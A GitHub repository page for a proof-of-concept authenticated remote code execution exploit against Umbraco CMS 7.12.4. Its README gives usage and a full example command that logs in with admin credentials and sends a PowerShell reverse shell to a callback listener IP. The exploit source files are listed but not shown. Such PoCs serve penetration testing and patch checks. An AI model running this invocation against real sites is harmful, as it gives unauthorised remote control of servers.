Skip to content
/ Umbraco-RCE Public

Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution

License

Apache-2.0 license
11 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Jonoans/Umbraco-RCE

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits

LICENSE

LICENSE

 
 

README.md

README.md

 
 

exploit.cs

exploit.cs

 
 

exploit.py

exploit.py

 
 

requirements.txt

requirements.txt

 
 

Repository files navigation

Umbraco RCE PowerShell Reverse Shell PoC

Usage

usage: exploit.py [-h] -u USER -p PASS -w URL -i IP

Umbraco authenticated RCE

optional arguments:
  -h, --help                 show this help message and exit
  -u USER, --user USER       Username / Email
  -p PASS, --password PASS   Login password
  -w URL, --website-url URL  Root URL
  -i IP, --ip IP             IP address of callback listener

Examples:

python exploit.py -u admin@example.org -p password123 -w 'http://remote.website/' -i 10.10.10.1

Requirements

To install dependencies:

pip install -r requirements.txt

Reference

This is a touch-up of noraj's PoC which is based off EDB-ID-46153.
This version provides a PowerShell reverse shell upon execution.

About

Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution

Topics

proof-of-concept exploit python3 poc rce umbraco-cms umbraco-v7 remote-code-execution

Resources

Readme

License

Apache-2.0 license
Activity

Stars

11 stars

Watchers

0 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages